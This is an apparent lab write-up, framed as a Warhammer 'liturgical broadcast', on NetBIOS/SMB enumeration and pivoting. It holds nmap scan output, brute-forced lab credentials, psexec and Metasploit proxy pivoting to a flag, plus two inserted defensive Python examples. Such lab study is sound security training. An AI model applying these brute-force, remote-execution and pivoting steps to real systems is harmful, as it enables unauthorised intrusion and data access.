+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
NetBIOS Components

| Component | Port(s) Used | Transport Protocol | Description |
|---|---|---|---|
| NetBIOS Name Service (NBNS) | UDP 137 | UDP | Resolves NetBIOS names to IP addresses; Microsoft's NBNS server implementation is WINS. |
| NetBIOS Datagram Service | UDP 138 | UDP | Used for connectionless communication, mainly broadcasts for simple messaging. |
| NetBIOS Session Service | TCP 139 | TCP | Handles connection-oriented communication (sessions) over the network. |
SMB Protocol Versions & Differences

| SMB Version | Introduced In | Port(s) Used | Key Features | Major Differences Over Previous |
|---|---|---|---|---|
| SMB 1.0 (CIFS) | Windows NT 4.0 / 95 | TCP 139 (NetBIOS), TCP 445 | Basic file and printer sharing; uses NetBIOS or direct hosting | Very chatty and inefficient, no encryption; deprecated and insecure |
| SMB 2.x | Windows Vista / Windows 7 | TCP 445 | Reduced command set, pipelining, compounding, better performance | Vast performance upgrade, removed NetBIOS dependency |
| SMB 3.0 | Windows 8 / Server 2012 | TCP 445 | Encryption, multichannel, RDMA (SMB Direct), transparent failover | First version with encryption and multichannel support |
| SMB 3.0.2 / 3.02 | Windows 8.1 / Server 2012 R2 | TCP 445 | Resilient file handles, improved failover and performance | Incremental improvements over 3.0 |
| SMB 3.1.1 | Windows 10 / Server 2016+ | TCP 445 | Pre-auth integrity (SHA-512), AES-128 GCM/CCM encryption | Strongest security features, mandatory secure negotiation |
NetBIOS enumeration using ‘nbtstat’

nbtstat is a Windows command-line tool used to query NetBIOS over TCP/IP. It helps with enumerating NetBIOS names, sessions, and the local name cache, which is useful for network diagnostics and reconnaissance.
Common nbtstat Commands

```cmd
:: View local NetBIOS names registered on this machine
nbtstat -n

:: Display the local NetBIOS name cache
nbtstat -c

:: Flush and reload the NetBIOS name cache
nbtstat -R

:: Get the NetBIOS name table of a remote machine (by name)
nbtstat -a TARGET_HOSTNAME

:: Get the NetBIOS name table of a remote machine (by IP address)
nbtstat -A 192.168.1.101

:: Display current NetBIOS sessions
nbtstat -S
```
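To make concrete what the NBNS service from the components table carries on UDP 137, and what the `<00>`, `<20>`, `<1C>` suffixes in an nbtstat name table mean, here is an added Python example (my own code, not part of the original post) implementing the RFC 1001 "first-level" NetBIOS name encoding and decoding. The host name ATTACKDEFENSE is taken from the scan output later in this post; the suffix table covers only the common well-known values, and the 0x20 suffix used in the demo is an assumption for illustration.

```python
# NetBIOS "first-level" name encoding (RFC 1001 section 14.1): the 16-byte
# name (15 characters space-padded plus a one-byte service suffix) is split
# into nibbles and each nibble is written as a letter 'A'..'P'.  This is the
# form NBNS queries on UDP/137 carry on the wire, and the suffix byte is what
# nbtstat shows as <00>, <20>, <1C> in its name tables.

ALPHABET = "ABCDEFGHIJKLMNOP"

# Well-known service suffixes (only the common ones are listed here).
SUFFIXES = {
    0x00: "Workstation Service (unique) / workgroup name (group)",
    0x03: "Messenger Service",
    0x20: "File Server Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers (group)",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections (group)",
}


def encode_raw(raw16):
    """Encode a full 16-byte NetBIOS name into its 32-letter wire form."""
    if len(raw16) != 16:
        raise ValueError("NetBIOS names are exactly 16 bytes before encoding")
    return "".join(ALPHABET[b >> 4] + ALPHABET[b & 0x0F] for b in raw16)


def encode_netbios_name(name, suffix):
    """Pad a name to 15 characters, append the suffix byte and encode it."""
    if len(name) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    return encode_raw(name.upper().ljust(15).encode("ascii") + bytes([suffix]))


def decode_netbios_name(encoded):
    """Reverse the encoding; returns (name, suffix) with space padding removed."""
    if len(encoded) != 32 or any(c not in ALPHABET for c in encoded):
        raise ValueError("expected 32 letters in the range A-P")
    raw = bytes(
        (ALPHABET.index(encoded[i]) << 4) | ALPHABET.index(encoded[i + 1])
        for i in range(0, 32, 2)
    )
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def describe(encoded):
    """Render a wire-encoded name the way nbtstat labels it: NAME<suffix> service."""
    name, suffix = decode_netbios_name(encoded)
    return f"{name}<{suffix:02X}> {SUFFIXES.get(suffix, 'unknown suffix')}"


if __name__ == "__main__":
    # Host name from the scan output on this page; the 0x20 suffix is my choice.
    wire = encode_netbios_name("ATTACKDEFENSE", 0x20)
    print(wire, "->", describe(wire))
    # The node-status query behind nbtstat -A asks for the wildcard name:
    # "*" followed by fifteen NUL bytes, which always encodes as "CK" + 30 "A"s.
    print(encode_raw(b"*" + b"\x00" * 15))
```

Seeing the 32-letter form is useful when reviewing packet captures: a UDP/137 query for `CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` is a node-status (name table) request, which is exactly what an `nbtstat -A` sweep against your subnet looks like from the wire.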
Lab
In this lab the goal is to pivot inside a network and get a flag. I've got a machine as a starting point, and after scanning and enumerating it I found an exposed SMB service with plenty of information after using the SMB scripts.
```text
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown

Host script results:
|_smb-print-text: false
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-enum-users:
|   ATTACKDEFENSE\admin (RID: 1009)
|     Flags:       Normal user account, Password does not expire
|   ATTACKDEFENSE\Administrator (RID: 500)
|     Description: Built-in account for administering the computer/domain
|     Flags:       Normal user account, Password does not expire
|   ATTACKDEFENSE\Guest (RID: 501)
|     Description: Built-in account for guest access to the computer/domain
|     Flags:       Account disabled, Normal user account, Password not required, Password does not expire
|   ATTACKDEFENSE\root (RID: 1010)
|_    Flags:       Normal user account, Password does not expire
|_smb-vuln-ms10-054: false
| smb-ls: Volume \\10.2.29.199\print$
|   maxfiles limit reached (10)
| SIZE   TIME                 FILENAME
| <DIR>  2013-08-22T15:39:31  .
| <DIR>  2013-08-22T15:39:31  ..
| <DIR>  2013-08-22T15:39:31  color
| <DIR>  2013-08-22T14:50:22  IA64
| <DIR>  2013-08-22T14:50:22  W32X86
| <DIR>  2013-08-22T14:50:24  W32X86\3
| <DIR>  2013-08-22T14:50:24  W32X86\PCC
| <DIR>  2013-08-22T15:39:31  x64
| <DIR>  2013-08-22T15:39:31  x64\3
| <DIR>  2013-08-22T14:50:22  x64\PCC
|_
|_smb-system-info: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares:
|   account_used: <blank>
|   \\10.2.29.199\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|   \\10.2.29.199\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|   \\10.2.29.199\Documents:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|   \\10.2.29.199\Downloads:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|   \\10.2.29.199\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|   \\10.2.29.199\Public:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|   \\10.2.29.199\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|_    Anonymous access: READ
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2:0:2
|     2:1:0
|     3:0:0
|_    3:0:2
| smb-mbenum:
|_  ERROR: Call to Browser Service failed with status = 2184
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: attackdefense
|   NetBIOS computer name: ATTACKDEFENSE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-07-30T09:26:55+00:00
|_smb-flood: ERROR: Script execution failed (use -d to debug)
| smb-enum-domains:
|   ATTACKDEFENSE
|     Groups: WinRMRemoteWMIUsers__
|     Users: admin, Administrator, Guest, root
|     Creation time: 2013-08-22T14:47:57
|     Passwords: min length: n/a; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: Access Control Assistance Operators, Administrators, Backup Operators, Certificate Service DCOM Access, Cryptographic Operators, Distributed COM Users, Event Log Readers, Guests, Hyper-V Administrators, IIS_IUSRS, Network Configuration Operators, Performance Log Users, Performance Monitor Users, Power Users, Print Operators, RDS Endpoint Servers, RDS Management Servers, RDS Remote Access Servers, Remote Desktop Users, Remote Management Users, Replicator, Users
|     Users: n/a
|     Creation time: 2013-08-22T14:47:57
|     Passwords: min length: n/a; min age: n/a days; max age: 42 days; history: n/a passwords
|_    Account lockout disabled
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-brute:
|_  guest:<blank> => Valid credentials, account disabled
```
We got some important information, such as user accounts, shares, and the fact that anonymous login is enabled.
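From a defender's side, the same NSE output is a hardening checklist: SMBv1 still offered, signing disabled, shares readable (and IPC$ writable) anonymously, and no account lockout. The Python below is an added example (my code, not from the original post or from nmap) that parses this host-script format and turns it into findings. The embedded sample is reconstructed from the scan output above, trimmed to the scripts the audit reads, with nmap's usual indentation restored; the recommendation strings are my wording.

```python
import re
from collections import defaultdict

# Host-script excerpt reconstructed from the nmap output above (page data,
# trimmed to the parts this audit reads, with nmap's usual indentation restored).
NSE_OUTPUT = r"""
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-enum-shares:
|   account_used: <blank>
|   \\10.2.29.199\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|   \\10.2.29.199\Documents:
|     Type: STYPE_DISKTREE
|     Anonymous access: READ
|   \\10.2.29.199\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2:0:2
|     2:1:0
|     3:0:0
|_    3:0:2
| smb-enum-domains:
|   ATTACKDEFENSE
|     Users: admin, Administrator, Guest, root
|_    Account lockout disabled
"""

# A script header is "| smb-xxx:" (or "|_smb-xxx: value" for one-line scripts);
# body lines sit deeper than one space after the gutter.
SCRIPT_HEADER = re.compile(r"^\|_?\s?(smb-[\w-]+):\s*(.*)$")
PIPE_PREFIX = re.compile(r"^\|_?\s*")


def parse_nse(text):
    """Group NSE host-script lines by script name, stripping the '|' gutter."""
    sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        header = SCRIPT_HEADER.match(raw)
        if header:
            current = header.group(1)
            if header.group(2):  # one-line scripts carry their value on the header
                sections[current].append(header.group(2).strip())
            continue
        if current is not None:
            sections[current].append(PIPE_PREFIX.sub("", raw).strip())
    return dict(sections)


def parse_shares(lines):
    """Turn smb-enum-shares body lines into {share_name: {field: value}}."""
    shares, name = {}, None
    for line in lines:
        if line.startswith("\\\\") and line.endswith(":"):  # "\\host\share:"
            name = line[:-1].rsplit("\\", 1)[1]
            shares[name] = {}
        elif name is not None and ": " in line:
            key, value = line.split(": ", 1)
            shares[name][key] = value
    return shares


def audit_smb(text):
    """Return the hardening findings a defender would raise from this output."""
    nse = parse_nse(text)
    findings = []
    if any(l.startswith("message_signing:") and "disabled" in l
           for l in nse.get("smb-security-mode", [])):
        findings.append("SMB signing disabled: enforce 'Digitally sign communications (always)' on the server")
    dialects = nse.get("smb-protocols", [])
    if any("SMBv1" in d for d in dialects):
        findings.append("SMBv1 dialect offered: remove the SMB1 feature; it has no integrity or encryption")
    if "3:1:1" not in dialects:
        findings.append("SMB 3.1.1 not offered: no pre-auth integrity or AES-GCM encryption available")
    for share, info in parse_shares(nse.get("smb-enum-shares", [])).items():
        access = info.get("Anonymous access", "<none>")
        if access != "<none>":
            findings.append(f"share {share} grants anonymous {access}: restrict to authenticated users")
    if "Account lockout disabled" in nse.get("smb-enum-domains", []):
        findings.append("account lockout disabled: online password guessing is unthrottled")
    return findings


if __name__ == "__main__":
    for finding in audit_smb(NSE_OUTPUT):
        print("-", finding)
```

Run against the sample it reports six findings; pointing it at a full `nmap --script smb-*` report works the same way because the parser keys on the script names rather than on line positions.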
So the next thing I did was create a wordlist from the user accounts I found, so I could brute-force SMB more easily.
```text
[445][smb] host: demo.ine.local   login: admin           password: tinkerbell
[445][smb] host: demo.ine.local   login: Administrator   password: password1
[445][smb] host: demo.ine.local   login: root            password: elizabeth
```
Now I will just use the psexec module from Metasploit to get a Meterpreter session on the machine.

After getting a session on the machine, normally I would use Metasploit modules to run a network scan to check whether there is any internal network accessible from the rooted machine, plus more hosts.

In the lab we were given the IP of a machine on an internal network, so I used the socks module from Metasploit to create a proxy server for proxychains to work with.
I set up the options in the module: SRVPORT → 9050, the port I took from /etc/proxychains4.conf.

I then ran the proxy server so I could use nmap from my machine to scan the internal network through the autoroute tables of the Metasploit session.
The flag

About the flag, I got it by doing the following:

In the lab we were introduced to net view, and with this Meterpreter session I didn't have access to it, so I migrated it to another process (explorer.exe), after which I got the following:
```text
Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
Documents    Disk
K            Disk
The command completed successfully.
```
I made those resources accessible with net use D: \\10.2.19.82\Documents, and then:
```text
C:\Windows\system32>dir D:\
dir D:\
 Volume in drive D has no label.
 Volume Serial Number is 5CD6-020B

 Directory of D:\

01/04/2022  05:22 AM    <DIR>          .
01/04/2022  05:22 AM    <DIR>          ..
01/04/2022  05:07 AM             1,425 Confidential.txt
01/04/2022  05:22 AM                70 FLAG2.txt
               2 File(s)          1,495 bytes
               2 Dir(s)   6,606,315,520 bytes free
```
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++